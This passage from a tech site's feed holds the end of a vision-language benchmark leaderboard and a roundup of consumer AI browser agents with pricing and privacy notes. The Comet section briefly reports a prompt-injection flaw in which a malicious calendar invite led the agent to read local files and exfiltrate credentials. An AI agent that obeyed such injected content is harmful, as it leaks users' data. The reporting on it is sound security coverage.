          <td>-</td>
      </tr>
      <tr>
          <td>7</td>
          <td>Qwen3.6 Plus</td>
          <td>Alibaba</td>
          <td>78.8%</td>
          <td>-</td>
          <td>81.5%</td>
          <td>-</td>
          <td>-</td>
      </tr>
      <tr>
          <td>8</td>
          <td>Qwen3-VL (72B)</td>
          <td>Alibaba</td>
          <td>69.3%</td>
          <td>85.8%</td>
          <td>-</td>
          <td>96.5%</td>
          <td>-</td>
      </tr>
      <tr>
          <td>9</td>
          <td>InternVL3-78B</td>
          <td>OpenGVLab</td>
          <td>-</td>
          <td>79.0%</td>
          <td>-</td>
          <td>95.4%</td>
          <td>89.7%</td>
      </tr>
      <tr>
          <td>10</td>
          <td>Llama 4 Maverick</td>
          <td>Meta</td>
          <td>-</td>
          <td>73.7%</td>
          <td>-</td>
          <td>94.4%</td>
          <td>90.0%</td>
      </tr>
  </tbody>
</table>
<p>A second table covers the perception- and OCR-focused benchmarks - BLINK, RealWorldQA, AI2D, and OCRBench - where open-source models feature most prominently:</p>
<table>
  <thead>
      <tr>
          <th>Rank</th>
          <th>Model</th>
          <th>Provider</th>
          <th>BLINK</th>
          <th>RealWorldQA</th>
          <th>AI2D</th>
          <th>OCRBench (of 1000)</th>
      </tr>
  </thead>
  <tbody>
      <tr>
          <td>1</td>
          <td>Qwen3 VL 235B</td>
          <td>Alibaba</td>
          <td><strong>70.7%</strong></td>
          <td><strong>85.1%</strong></td>
          <td>89.7%</td>
          <td>-</td>
      </tr>
      <tr>
          <td>2</td>
          <td>Qwen3.6 Plus</td>
          <td>Alibaba</td>
          <td>-</td>
          <td>85.4%</td>
          <td><strong>94.4%</strong></td>
          <td>-</td>
      </tr>
      <tr>
          <td>3</td>
          <td>InternVL3-78B</td>
          <td>OpenGVLab</td>
          <td>-</td>
          <td>78.0%</td>
          <td>89.7%</td>
          <td><strong>906</strong></td>
      </tr>
      <tr>
          <td>4</td>
          <td>Qwen3 VL 32B</td>
          <td>Alibaba</td>
          <td>67.3%</td>
          <td>79.0%</td>
          <td>89.5%</td>
          <td>-</td>
      </tr>
      <tr>
          <td>5</td>
          <td>Claude 3.5 Sonnet</td>
          <td>Anthropic</td>
          <td>-</td>
          <td>-</td>
          <td>94.7%</td>
          <td>-</td>
      </tr>
      <tr>
          <td>6</td>
          <td>Llama 4 Maverick</td>
          <td>Meta</td>
          <td>-</td>
          <td>-</td>
          <td>-</td>
          <td>-</td>
      </tr>
      <tr>
          <td>7</td>
          <td>Phi-4 Multimodal</td>
          <td>Microsoft</td>
          <td>61.3%</td>
          <td>-</td>
          <td>-</td>
          <td>-</td>
      </tr>
  </tbody>
</table>
<p><img src="/images/leaderboards/vision-language-benchmarks-leaderboard-chart.jpg" alt="Close-up of a business graph on paper showing data analysis">
<em>Chart understanding is one of the harder visual reasoning tasks - models must identify axes, read legends, and reason about relationships that aren't explicitly stated.</em>
<small>Source: pexels.com</small></p>
<hr>
<h2 id="key-takeaways">Key Takeaways</h2>
<h3 id="gemini-31-pro-leads-on-mmmu-pro-gpt-54-leads-on-documents">Gemini 3.1 Pro Leads on MMMU-Pro, GPT-5.4 Leads on Documents</h3>
<p>Gemini 3.1 Pro scores 82% on MMMU-Pro, the highest confirmed score on that benchmark from any currently available model. Its 92% on DocVQA and 90% on ChartQA are competitive but not dominant - GPT-5.4 scores 95% and 92.5% respectively on those two. The split makes sense architecturally. Google trained Gemini as a natively multimodal model from the beginning, which advantages it on broad academic visual reasoning. GPT-5.4 applies a stronger language model to extracted document representations, which advantages it on structured text extraction from forms and invoices.</p>
<p>For practitioners: Gemini 3.1 Pro is the better pick when the visual content is complex or diagram-heavy. GPT-5.4 is the better pick for production document processing pipelines where DocVQA-style extraction is the core task. You can read our <a href="/reviews/review-gemini-3-1-pro/">Gemini 3.1 Pro review</a> and <a href="/reviews/review-gpt-5-4/">GPT-5.4 review</a> for hands-on testing beyond benchmark scores.</p>
<h3 id="claude-opus-47-wins-scientific-charts">Claude Opus 4.7 Wins Scientific Charts</h3>
<p>Claude Opus 4.7 holds the top CharXiv-R score at 91.0%, 2.6 points above Muse Spark and well ahead of other frontier models. This result is directly tied to the resolution upgrade introduced with Opus 4.7 - maximum image input increased from 1,568px (1.15MP) to 2,576px (3.75MP), roughly 3.3x more pixels. Scientific charts from arXiv papers often pack dense information into small visual areas, and the resolution upgrade makes a concrete difference on exactly those cases.</p>
<p>The result also stands apart because CharXiv-R is scored independently from provider benchmarking pipelines. It uses charts from real papers rather than constructed datasets, making contamination less likely. For research and data analysis workflows where scientific figures are central, Opus 4.7's lead on this benchmark translates to practical value.</p>
<div class="pull-quote">
<p>Claude Opus 4.7's 91.0% on CharXiv-R is the highest chart reasoning score from any generally available model - and it's directly attributable to a 3.3x resolution increase.</p>
</div>
<h3 id="qwen-dominates-open-source-visual-reasoning">Qwen Dominates Open-Source Visual Reasoning</h3>
<p>Alibaba's Qwen VL family has established clear leadership among open-source vision-language models. Qwen3 VL 235B tops the BLINK leaderboard at 70.7% and holds the best RealWorldQA scores. Qwen3-VL's larger model (72B) scores 85.8% on MathVista and 96.5% on DocVQA - the latter beating every closed-source frontier model in this comparison, including GPT-5.4's 95%. Qwen3.6 Plus scores 94.4% on AI2D.</p>
<p>This is a reversal from where things stood 18 months ago, when open-source multimodal models lagged frontier proprietary models by 15-20 points on most benchmarks. The gap on DocVQA is now essentially closed for Qwen3-VL and InternVL3. On MMMU-Pro, a meaningful gap remains - Qwen3-VL scores 69.3% against the 81-82% from Gemini 3.1 Pro and GPT-5.4. Broad multi-discipline academic reasoning at the graduate level still favors proprietary models. Specialized document and chart tasks don't.</p>
<p>See our <a href="/reviews/review-qwen-3/">Qwen 3 review</a> for context on how the broader Qwen model family performs outside visual benchmarks.</p>
<h3 id="blink-shows-what-frontier-models-still-get-wrong">BLINK Shows What Frontier Models Still Get Wrong</h3>
<p>BLINK remains the most humbling benchmark for visual reasoning. Qwen3 VL 235B leads at 70.7%, while a human would score around 95% on the same set of tasks. The gap isn't about knowledge or reasoning sophistication - it's about perceptual grounding. Tasks that require comparing relative depths in a photograph, tracing visual correspondence between two views of an object, or identifying which 3D object a 2D shadow belongs to still trip up current models at a rate that should give pause to anyone building systems where physical-world perception is safety-critical.</p>
<p>Worth noting: a 2026 paper showed BLINK scores are sensitive to design choices like visual marker size and style, which can reorder model rankings. The absolute scores should be read with some skepticism.</p>
<h3 id="mathvista-qwen-vl-beats-the-frontier">MathVista: Qwen-VL Beats the Frontier</h3>
<p>The MathVista result is striking enough to call out directly. Qwen3-VL 72B scores 85.8% on MathVista, higher than any frontier proprietary model in this comparison. Gemini 3 Pro (82.3%) and GPT-5.4 (78.4%) trail it. Mathematical visual reasoning - reading geometry figures, interpreting function graphs, extracting data from statistical tables - is a domain where the Qwen team has invested heavily. InternVL3-78B (79.0%) also beats GPT-5.4 on this specific benchmark.</p>
<p>For applications involving quantitative analysis from images - financial charts, scientific figures, engineering diagrams - the assumption that proprietary frontier models are always the best choice doesn't hold. The open-source alternatives are worth assessing on your actual task distribution.</p>
<p><img src="/images/leaderboards/vision-language-benchmarks-leaderboard-lens.jpg" alt="Close-up of smartphone camera lens showing precision optics">
<em>Increasing image input resolution was a key architectural decision for Opus 4.7 - from 1.15MP to 3.75MP - directly improving performance on dense visual content.</em>
<small>Source: pexels.com</small></p>
<hr>
<h2 id="practical-guidance">Practical Guidance</h2>
<h3 id="best-for-enterprise-document-processing">Best for Enterprise Document Processing</h3>
<p><strong>GPT-5.4</strong> is the clear choice if your pipeline mostly processes invoices, contracts, forms, and receipts. Its 95% on DocVQA and 92.5% on ChartQA combined with strong language model capability for following complex extraction instructions makes it the most reliable option for production document workflows. The pricing isn't cheap, but document processing use cases usually justify it on value recovered per document.</p>
<p><strong>Qwen3-VL 72B</strong> is the open-source alternative worth evaluating seriously. At 96.5% on DocVQA it matches or beats every proprietary model, and it can be self-hosted on infrastructure you control - which matters for document workflows involving sensitive data.</p>
<h3 id="best-for-scientific-research-assistance">Best for Scientific Research Assistance</h3>
<p><strong>Claude Opus 4.7</strong> takes the top spot for scientific figure analysis. If your application needs to extract insights from arXiv-style charts, interpret experimental results, or process multi-panel research figures, the CharXiv-R result at 91.0% is the most relevant signal available. The extended resolution also helps with poster presentations and conference slides where content density is high.</p>
<h3 id="best-for-mathematical-and-technical-reasoning-from-images">Best for Mathematical and Technical Reasoning from Images</h3>
<p><strong>Qwen3-VL 72B</strong> scores highest on MathVista (85.8%) among all models with confirmed scores. For geometry problems, quantitative chart analysis, or any task requiring mathematical inference from a visual input, this is the model to test first. InternVL3-78B (79.0%) is a strong second and has a more mature deployment ecosystem.</p>
<h3 id="budget-option">Budget Option</h3>
<p><strong>Llama 4 Maverick</strong> from Meta scores 73.7% on MathVista, 94.4% on DocVQA, and 90% on ChartQA - truly competitive with models from a year ago that commanded much higher pricing. It's open-weight and deployable via standard inference infrastructure. Our <a href="/reviews/review-llama-4-maverick/">Llama 4 Maverick review</a> covers performance in more depth.</p>
<hr>
<h2 id="methodology-caveats">Methodology Caveats</h2>
<p>Two issues specific to visual reasoning benchmarks are worth acknowledging. First, several of these benchmarks - especially DocVQA and ChartQA - are now in a range where small differences in evaluation configuration (prompt format, few-shot examples, extraction parsing) can swing results by 1-3 points. Numbers from different evaluators shouldn't be compared directly. The scores in this table are sourced from provider-reported results where available and independent evaluators where not, which introduces some inconsistency.</p>
<p>Second, MMMU contamination is a genuine concern. The original MMMU questions are widely available online, and models trained after 2024 on broad web datasets will have seen some fraction of them. MMMU-Pro and CharXiv use harder-to-replicate content, but no benchmark is immune. This is why the field is developing new evaluations like OCRBench v2, which used human-verified pairs not published before the benchmark's release.</p>
<p>For more context on how to read AI benchmark data critically, see our <a href="/guides/understanding-ai-benchmarks/">guide to understanding AI benchmarks</a>.</p>
<hr>
<h2 id="faq">FAQ</h2>
<h3 id="which-model-is-best-for-reading-scanned-documents">Which model is best for reading scanned documents?</h3>
<p>GPT-5.4 leads the proprietary field on DocVQA at 95%, making it the top managed-API choice for scanned document extraction. Qwen3-VL 72B scores 96.5% and is the best open-source alternative for sensitive or self-hosted workflows.</p>
<h3 id="is-mmmu-still-useful-for-comparing-models-in-2026">Is MMMU still useful for comparing models in 2026?</h3>
<p>MMMU-Pro is the more useful variant. The original MMMU is too saturated above 80% to differentiate frontier models. MMMU-Pro, with 10-option questions and harder visual reasoning requirements, still provides meaningful signal.</p>
<h3 id="why-does-qwen-vl-beat-frontier-models-on-some-benchmarks">Why does Qwen-VL beat frontier models on some benchmarks?</h3>
<p>Qwen3-VL has been optimized specifically for document and mathematical visual tasks with targeted training data. On MathVista (85.8%) and DocVQA (96.5%) it outperforms all closed-source models. On broader academic multi-discipline benchmarks like MMMU-Pro, proprietary frontier models maintain a lead.</p>
<h3 id="how-is-charxiv-different-from-chartqa">How is CharXiv different from ChartQA?</h3>
<p>ChartQA uses presentation-style charts and is now cleared at 90%+ by most models. CharXiv uses charts from actual arXiv scientific papers, which are significantly denser and less standardized. CharXiv-R specifically tests multi-step reasoning across full charts rather than single-fact lookup questions.</p>
<h3 id="what-does-blink-measure">What does BLINK measure?</h3>
<p>BLINK tests core visual perception - depth estimation, visual correspondence, multi-view reasoning, and similar tasks humans solve instantly. Models still score far below human performance (70% vs. 95%), making BLINK one of the few benchmarks where frontier models clearly fail at something humans find trivial.</p>
<h3 id="how-often-should-i-re-check-these-rankings">How often should I re-check these rankings?</h3>
<p>Visual reasoning is one of the faster-moving benchmark categories right now. Claude Opus 4.7's resolution upgrade and Qwen3-VL's document improvements both shipped in early 2026. Check this leaderboard quarterly - major capability jumps are still happening at multi-month intervals.</p>
<hr>
<p><strong>Sources:</strong></p>
<ul>
<li><a href="https://llm-stats.com/benchmarks/mmmu-pro">MMMU-Pro Leaderboard - llm-stats.com</a></li>
<li><a href="https://llm-stats.com/benchmarks/mmmu">MMMU Leaderboard - llm-stats.com</a></li>
<li><a href="https://mathvista.github.io/">MathVista - mathvista.github.io</a></li>
<li><a href="https://llm-stats.com/benchmarks/charxiv-r">CharXiv-R Leaderboard - llm-stats.com</a></li>
<li><a href="https://llm-stats.com/benchmarks/blink">BLINK Leaderboard - llm-stats.com</a></li>
<li><a href="https://llm-stats.com/benchmarks/realworldqa">RealWorldQA Leaderboard - llm-stats.com</a></li>
<li><a href="https://llm-stats.com/benchmarks/ai2d">AI2D Leaderboard - llm-stats.com</a></li>
<li><a href="https://arxiv.org/html/2501.00321v2">OCRBench v2 Paper - arxiv.org</a></li>
<li><a href="https://arxiv.org/html/2504.10479v1">InternVL3 Paper - arxiv.org</a></li>
<li><a href="https://www.llama.com/models/llama-4/">Llama 4 Benchmarks - llama.com</a></li>
<li><a href="https://automatio.ai/models/gemini-3-1-pro">Gemini 3.1 Pro Benchmarks - automatio.ai</a></li>
<li><a href="https://automatio.ai/models/gpt-5-4">GPT-5.4 Benchmarks - automatio.ai</a></li>
<li><a href="https://www.vellum.ai/blog/claude-opus-4-7-benchmarks-explained">Claude Opus 4.7 Benchmarks - vellum.ai</a></li>
<li><a href="https://artificialanalysis.ai/evaluations/mmmu-pro">MMMU-Pro Benchmark - Artificial Analysis</a></li>
<li><a href="https://arxiv.org/abs/2511.21631">Qwen3-VL Technical Report - arxiv.org</a></li>
<li><a href="https://charxiv.github.io/">CharXiv Benchmark - charxiv.github.io</a></li>
<li><a href="https://arxiv.org/html/2404.12390v3">BLINK Benchmark Paper - arxiv.org</a></li>
</ul>
]]></content:encoded><dc:creator>James Kowalski</dc:creator><category>Leaderboards</category><media:content url="https://awesomeagents.ai/images/leaderboards/vision-language-benchmarks-leaderboard_hu_4e1e0c24fc4a2024.jpg" medium="image" width="1200" height="675"/><media:thumbnail url="https://awesomeagents.ai/images/leaderboards/vision-language-benchmarks-leaderboard_hu_4e1e0c24fc4a2024.jpg" width="1200" height="675"/></item><item><title>Best AI Browser Agents 2026: Top Picks Compared</title><link>https://awesomeagents.ai/tools/best-ai-browser-agents-2026/</link><pubDate>Fri, 17 Apr 2026 13:26:32 +0200</pubDate><guid>https://awesomeagents.ai/tools/best-ai-browser-agents-2026/</guid><description>&lt;p>The browser market split in 2025. On one side: developer-oriented automation tools like Browser Use and Playwright MCP (covered in our &lt;a href="/tools/best-ai-browser-automation-tools-2026/">AI browser automation tools roundup&lt;/a>). On the other: consumer-facing AI browsers that ship with an agent built right into the UI. You download a browser, open it, and tell it to book you a flight. No API keys. No Python.&lt;/p></description><content:encoded xmlns:content="http://purl.org/rss/1.0/modules/content/"><![CDATA[<p>The browser market split in 2025. On one side: developer-oriented automation tools like Browser Use and Playwright MCP (covered in our <a href="/tools/best-ai-browser-automation-tools-2026/">AI browser automation tools roundup</a>). On the other: consumer-facing AI browsers that ship with an agent built right into the UI. You download a browser, open it, and tell it to book you a flight. No API keys. No Python.</p>
<p>This article covers the second category - browsers you'd actually put on your daily machine, where the AI agent is the product, not a plugin on top of it.</p>
<div class="news-tldr">
<p><strong>TL;DR</strong></p>
<ul>
<li><strong>Best overall:</strong> Perplexity Comet - deepest agentic task completion, cross-device, Claude Opus 4.6 powering Max tier, but security history is checkered</li>
<li><strong>Best privacy-first pick:</strong> Brave with AI Browsing - no IP logging, no training on your data, free base tier, local-only option available</li>
<li><strong>Best enterprise option:</strong> Island Browser - policy controls, DLP, full audit trails, agents sandboxed in a hardened Chromium environment</li>
<li>Dia, Opera Neon, and Chrome Auto Browse all landed agentic features in late 2025/early 2026 - the market is crowded and pricing has converged around $20/month</li>
</ul>
</div>
<hr>
<h2 id="what-makes-a-browser-agent-different">What Makes a Browser Agent Different</h2>
<p>A browser agent isn't a chatbot attached to your browser. The distinction matters. A chatbot answers questions about a page. An agent navigates, clicks, fills forms, and completes multi-step workflows across multiple sites without you touching the keyboard again after the initial prompt.</p>
<p>The test I use: can it book a round-trip flight to Berlin, find me a hotel under $150/night nearby, and output a formatted itinerary - all from one prompt? That task requires authenticating to travel sites, comparing multiple results, and handling decision branches when options differ. Most &quot;AI browsers&quot; fail it or require constant hand-holding. A real browser agent doesn't.</p>
<p>The other axis is privacy. Cloud-based agents process your browsing session on someone else's server. That's a real tradeoff, and not all vendors are transparent about it.</p>
<hr>
<h2 id="perplexity-comet">Perplexity Comet</h2>
<p>Comet launched on Windows and macOS in July 2025, Android in November 2025, and iOS in March 2026. It's Chromium-based, ships with a persistent AI sidebar, and at the Max tier it routes tasks through Claude Opus 4.6 for reasoning-heavy work.</p>
<p>The agent can autonomously research a topic across multiple sites, summarize findings, fill forms, manage email, and book travel. Comet Plus ($5/month, or included in Pro and Max plans) gives the agent access to trusted journalism and premium sources when doing research tasks.</p>
<p><strong>Pricing:</strong></p>
<table>
  <thead>
      <tr>
          <th>Plan</th>
          <th>Price</th>
          <th>Comet agent tier</th>
      </tr>
  </thead>
  <tbody>
      <tr>
          <td>Free</td>
          <td>$0</td>
          <td>Basic assistant, no autonomous tasks</td>
      </tr>
      <tr>
          <td>Pro</td>
          <td>$20/month</td>
          <td>Full agent access, standard models</td>
      </tr>
      <tr>
          <td>Max</td>
          <td>$200/month</td>
          <td>Autonomous tasks, Claude Opus 4.6, 10,000 credits</td>
      </tr>
      <tr>
          <td>Enterprise Pro</td>
          <td>$40/seat/month</td>
          <td>Team controls, SSO</td>
      </tr>
      <tr>
          <td>Enterprise Max</td>
          <td>$325/seat/month</td>
          <td>Full agentic + compliance controls</td>
      </tr>
  </tbody>
</table>
<p>The $200 Max plan is the only one that unlocks what Perplexity calls &quot;Max Assistant&quot; - the routing layer that picks the right model for each subtask. For most users, the $20 Pro plan handles the majority of research and form-filling work.</p>
<p><strong>Platforms:</strong> macOS, Windows, Android, iOS.</p>
<p><strong>Privacy concern:</strong> Comet has built up six significant security vulnerabilities since its July 2025 launch. The most recent - disclosed by Zenity Labs in March 2026 - showed that a malicious calendar invite could hijack the agent into reading local files and exfiltrating credentials. <a href="/news/perplexity-comet-browser-local-file-leak/">We covered the full vulnerability chain here</a>. Perplexity patched it after a 120-day disclosure window, but the pattern of dismissing reports before quietly fixing them is worth noting. A federal court also issued a preliminary injunction in March 2026 blocking Comet's agent from accessing Amazon accounts without platform-level authorization.</p>
<p>The agentic capability is real and among the best in this category. The security track record is the asterisk.</p>
<hr>
<h2 id="dia-by-atlassian--the-browser-company">Dia (by Atlassian / The Browser Company)</h2>
<p>Dia launched in beta in June 2025, went broadly available on macOS in October 2025, and started Windows early access in March 2026. Atlassian picked up The Browser Company for $610 million in October 2025, which explains the integration push into Slack, Notion, Google Calendar, and Gmail that landed in early 2026.</p>
<p>The core interaction model is &quot;chat with your tabs.&quot; You open a bunch of research tabs, ask Dia a question, and it synthesizes an answer from everything you have open. The cross-tab reasoning is genuinely useful for knowledge work - I ran it across six tabs of conflicting benchmark data and it held the context correctly.</p>
<p>The agentic capabilities are less aggressive than Comet. Dia handles research, writing, planning, and product comparison well. It doesn't book flights or run fully autonomous multi-step workflows the way Comet's Max tier does. That may be intentional positioning - Dia is macOS-first and targets knowledge workers, not power-user automation.</p>
<p><strong>Pricing:</strong></p>
<table>
  <thead>
      <tr>
          <th>Plan</th>
          <th>Price</th>
          <th>Notes</th>
      </tr>
  </thead>
  <tbody>
      <tr>
          <td>Free</td>
          <td>$0</td>
          <td>Limited AI usage, basic assistant</td>
      </tr>
      <tr>
          <td>Dia Pro</td>
          <td>$20/month</td>
          <td>Full AI features, integrations</td>
      </tr>
  </tbody>
</table>
<p><strong>Platforms:</strong> macOS (generally available), Windows (early access as of March 2026).</p>
<p><strong>Privacy:</strong> Dia's privacy model isn't publicly detailed in the same way as Brave's. Sessions are processed in the cloud. Given the Atlassian acquisition, enterprise data governance policies will likely tighten - but for now, treating Dia as a cloud-processed assistant is the correct assumption.</p>
<p>The Atlassian backing is a meaningful signal for long-term viability. It's also a reason to expect Jira and Confluence integrations within the year.</p>
<hr>
<h2 id="opera-neon">Opera Neon</h2>
<p>Opera made an aggressive move in this space. It started with Browser Operator in March 2025 - the first major browser to ship a native agentic feature - then rebuilt it into a standalone AI-first product called Neon, which launched in September 2025 and started charging $19.90/month in December 2025.</p>
<p>Neon's &quot;Neon Do&quot; feature handles shopping, booking, information gathering, and form completion. The technical approach is notable: it runs client-side rather than processing screenshots in the cloud, using native browser APIs to take actions without sending a video feed of your session to Opera's servers. That's a genuine privacy differentiator versus Comet.</p>
<p>The $19.90 tier includes Gemini 3 Pro and GPT-5.1 - a capable agent with solid model access for the price.</p>
<p><strong>Pricing:</strong> $19.90/month. No free tier with agentic features.</p>
<p><strong>Platforms:</strong> Desktop (Windows, macOS, Linux), mobile in development.</p>
<p><strong>Best for:</strong> Users who want agentic browsing with stronger local-processing privacy guarantees than Comet and don't need the deep research tier.</p>
<hr>
<h2 id="chrome-with-gemini-auto-browse">Chrome with Gemini Auto Browse</h2>
<p>Google shipped Gemini into Chrome's sidebar in January 2026, with Auto Browse - the agentic feature - reserved for AI Pro and Ultra subscribers. The integration runs on Gemini 3.1 and handles tasks like filling forms from PDFs, filtering apartment searches, scheduling appointments, and filing expense reports.</p>
<p>Auto Browse supports Google's Universal Commerce Protocol (UCP), a standard co-developed with Shopify, Etsy, Wayfair, and Target that lets the agent complete purchases across participating retailers without breaking mid-flow. That's the most concrete agentic commerce capability of any browser in this list.</p>
<p><strong>Pricing:</strong></p>
<table>
  <thead>
      <tr>
          <th>Plan</th>
          <th>Price</th>
          <th>Auto Browse limit</th>
      </tr>
  </thead>
  <tbody>
      <tr>
          <td>AI Plus</td>
          <td>$7.99/month</td>
          <td>Not included</td>
      </tr>
      <tr>
          <td>AI Pro</td>
          <td>$19.99/month</td>
          <td>20 tasks/day</td>
      </tr>
      <tr>
          <td>AI Ultra</td>
          <td>$249.99/month</td>
          <td>200 tasks/day</td>
      </tr>
  </tbody>
</table>
<p><strong>Platforms:</strong> Windows, macOS, ChromeOS. US-only for Auto Browse as of April 2026.</p>
<p>The main limitation: 20 tasks/day at the $19.99 tier is constraining if you're using it for serious workflow automation. And &quot;Auto Browse&quot; is a feature inside Chrome, not a new browser - you're still running Chrome with a subscription-gated agentic panel. That's a different value proposition than a purpose-built agent browser like Comet.</p>
<p><img src="/images/tools/best-ai-browser-agents-2026-comet.jpg" alt="Person using a laptop browser with multiple tabs open for research tasks">
<em>AI browser agents work across multiple open tabs to synthesize research, fill forms, and complete multi-step tasks without manual navigation.</em>
<small>Source: unsplash.com</small></p>
<hr>
<h2 id="brave-with-ai-browsing">Brave with AI Browsing</h2>
<p>Brave Leo has been the privacy-first AI assistant story for two years. In 2026, Brave added AI Browsing - an autonomous mode available in Brave Nightly - that takes the privacy story into agentic territory.</p>
<p>The privacy claim is verifiable. Brave doesn't log IP addresses, doesn't retain chat history, and doesn't train on your conversations. The new Trusted Execution Environment (TEE) deployment cryptographically verifies these claims rather than asking you to take them on faith. That's a level of privacy assurance no other browser in this roundup matches.</p>
<p>The AI Browsing feature itself is still in Nightly (pre-release). It can research across multiple sites, compare products, fill shopping carts, and complete multi-step tasks. Leo supports Mixtral, Claude, and Llama models depending on tier.</p>
<p><strong>Pricing:</strong></p>
<table>
  <thead>
      <tr>
          <th>Plan</th>
          <th>Price</th>
          <th>Notes</th>
      </tr>
  </thead>
  <tbody>
      <tr>
          <td>Free</td>
          <td>$0</td>
          <td>Leo assistant, limited usage, standard models</td>
      </tr>
      <tr>
          <td>Leo Premium</td>
          <td>$14.99/month</td>
          <td>Higher limits, priority model access, up to 5 devices</td>
      </tr>
  </tbody>
</table>
<p><strong>Platforms:</strong> Windows, macOS, Linux, Android, iOS.</p>
<p>The &quot;Bring Your Own Model&quot; option lets you connect a local Ollama instance or custom API endpoint. For users running local LLMs, Brave is the only mainstream browser that supports fully local inference with no cloud hop at all.</p>
<hr>
<h2 id="fellou">Fellou</h2>
<p>Fellou launched in May 2025 as an independent European startup (ex-DeepMind and Mozilla engineers) and went Commercial Edition in September 2025. It runs the &quot;shadow workspace&quot; model: tasks execute in a background virtual window, visible to you but not interrupting your active browsing session.</p>
<p>Before executing anything, Fellou generates a step-by-step action plan for review. You can edit or cancel before it starts. That's the right design for users who want agent assistance without a black box running loose in their browser.</p>
<p>The RAG layer is interesting - Fellou can pull from 43+ live data sources including LinkedIn, Reddit, academic databases, and membership sites. The benchmark claim from the company (5.2x faster on complex multi-domain tasks versus Claude and Perplexity) comes from their own internal testing and isn't independently verified.</p>
<p><strong>Pricing:</strong></p>
<table>
  <thead>
      <tr>
          <th>Plan</th>
          <th>Price</th>
          <th>Notes</th>
      </tr>
  </thead>
  <tbody>
      <tr>
          <td>Free</td>
          <td>$0</td>
          <td>Up to 4 tasks, then upgrade required</td>
      </tr>
      <tr>
          <td>Plus</td>
          <td>~$20/month</td>
          <td>More Sparks (task credits), scheduled tasks</td>
      </tr>
      <tr>
          <td>Ultra</td>
          <td>$199.90/month</td>
          <td>Unlimited Sparks, concurrent tasks, priority support</td>
      </tr>
  </tbody>
</table>
<p><strong>Platforms:</strong> macOS (generally available), Windows in development.</p>
<p>The &quot;Sparks&quot; credit model is worth understanding before committing. Each task consumes a variable number of Sparks based on complexity. Fellou estimates the cost before running, which at least gives you visibility, but the variable pricing can add up for power users. The Plus tier is competitive with Comet Pro for most use cases.</p>
<hr>
<h2 id="microsoft-edge-copilot-mode">Microsoft Edge Copilot Mode</h2>
<p>Edge's Copilot Mode - generally available as of late 2025 - is the enterprise play in this space. The consumer-grade agent story is real: Agent Mode handles multi-step browser workflows using Microsoft's CUA (Computer-Using Agent) models, multi-tab reasoning analyzes up to 30 open tabs simultaneously, and there's a Daily Briefing that pulls from Microsoft Graph and your browsing history.</p>
<p>Where Edge distinguishes itself is governance. DLP policies you've already configured in Microsoft 365 apply automatically to agentic actions. Agent Mode won't touch passwords or payment fields without explicit permission. IT admins control which sites the agent can access.</p>
<p><strong>Pricing:</strong> Copilot Mode comes with Microsoft 365 subscriptions ($6-$22/user/month depending on tier). Microsoft 365 Copilot ($30/user/month) unlocks the full enterprise agentic layer including Agent Mode.</p>
<p><strong>Platforms:</strong> Windows, macOS, iOS, Android.</p>
<p><strong>Best for:</strong> Organizations already on Microsoft 365 that need AI browsing within existing governance boundaries. Consumer users get the features for free with Edge, but the governance controls that make it genuinely enterprise-ready require the paid tier.</p>
<p><img src="/images/tools/best-ai-browser-agents-2026-privacy.jpg" alt="Locked padlock with digital security overlay representing browser privacy and data protection">
<em>Privacy models vary notably across AI browsers - from cloud-processed sessions to TEE-verified local inference and full self-hosted options.</em>
<small>Source: unsplash.com</small></p>
<hr>
<h2 id="island-enterprise-browser">Island Enterprise Browser</h2>
<p>Island isn't competing on consumer features. It's a security-first enterprise browser built for organizations that need to know exactly what their agents are doing at all times.</p>
<p>The March 2026 enterprise AI platform launch added three layers: an AI Browser that embeds governed AI chat (multiple frontier models, enterprise context via RAG, DLP enforcement), AI Automation for building and running on-demand agents with defined permissions and audit trails, and full admin controls over what sites agents can access and what actions require human approval.</p>
<p>The &quot;hardened Chromium environment&quot; framing is the key point: agents run inside a browser designed to reduce prompt injection exposure. After the year Comet had with its injection vulnerabilities, that's not just marketing language.</p>
<p><strong>Pricing:</strong> Enterprise pricing, not publicly listed. Expect per-seat contracts.</p>
<p><strong>Platforms:</strong> Windows, macOS.</p>
<p><strong>Best for:</strong> Financial services, healthcare, legal, and government organizations that can't accept the security posture of consumer agentic browsers.</p>
<hr>
<h2 id="open-source-options-surfer-and-browserbase">Open-Source Options: Surfer and Browserbase</h2>
<p>Two open-source options deserve mention for developers who want to build on top of browser agent technology rather than just use it.</p>
<p><strong>Surfer-H / Surfer 2 (H Company):</strong> An open-weight web agent that hit 92.2% on WebVoyager and 97.1% on agentic benchmarks with Surfer 2 - the state-of-the-art result as of February 2026. The Holo1 VLM models are open-sourced. This is for building agents, not for daily browsing, but it's the most capable open-weight foundation available. The <a href="https://github.com/hcompai/surfer-h-cli">CLI is available on GitHub</a>.</p>
<p><strong>Browserbase + Stagehand:</strong> The developer infrastructure layer. Stagehand wraps Playwright with LLM primitives; Browserbase provides the managed headless browser fleet. Covered in depth in <a href="/tools/best-ai-browser-automation-tools-2026/">our browser automation roundup</a>. The free tier (1 concurrent browser, 1 hour) lets you prototype before spending anything.</p>
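<p>To make the pattern concrete: these tools boil down to an LLM translating a natural-language instruction into a concrete browser action that Playwright then executes. The sketch below illustrates that loop in plain Playwright for Python - it is not Stagehand's actual API, and <code>llm()</code> is an assumed helper that returns a CSS selector as text.</p>
<pre><code class="language-python"># Illustration of the LLM-plus-Playwright pattern (not Stagehand's API).
# llm() is an assumed helper that sends a prompt to a model and returns text.
from playwright.sync_api import sync_playwright

def act(page, instruction):
    # Ask the model for a CSS selector matching the instruction, then execute it.
    selector = llm(
        "Return only a CSS selector for the element matching this instruction: "
        f"{instruction}\n\nPage HTML:\n{page.content()[:20000]}"
    ).strip()
    page.click(selector)

with sync_playwright() as p:
    browser = p.chromium.launch()
    page = browser.new_page()
    page.goto("https://example.com")
    act(page, "open the page's main navigation link")
    browser.close()
</code></pre>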
<hr>
<h2 id="full-comparison-table">Full Comparison Table</h2>
<table>
  <thead>
      <tr>
          <th>Browser</th>
          <th>Agent tier</th>
          <th>Agentic tasks</th>
          <th>Privacy model</th>
          <th>Entry price</th>
          <th>Platforms</th>
      </tr>
  </thead>
  <tbody>
      <tr>
          <td>Perplexity Comet</td>
          <td>High - Opus 4.6</td>
          <td>Flight booking, email, research</td>
          <td>Cloud (security incidents)</td>
          <td>Free / $20 Pro</td>
          <td>Win, Mac, iOS, Android</td>
      </tr>
      <tr>
          <td>Dia</td>
          <td>Medium - knowledge work</td>
          <td>Research, writing, planning</td>
          <td>Cloud (Atlassian)</td>
          <td>Free / $20 Pro</td>
          <td>Mac (Win in EA)</td>
      </tr>
      <tr>
          <td>Opera Neon</td>
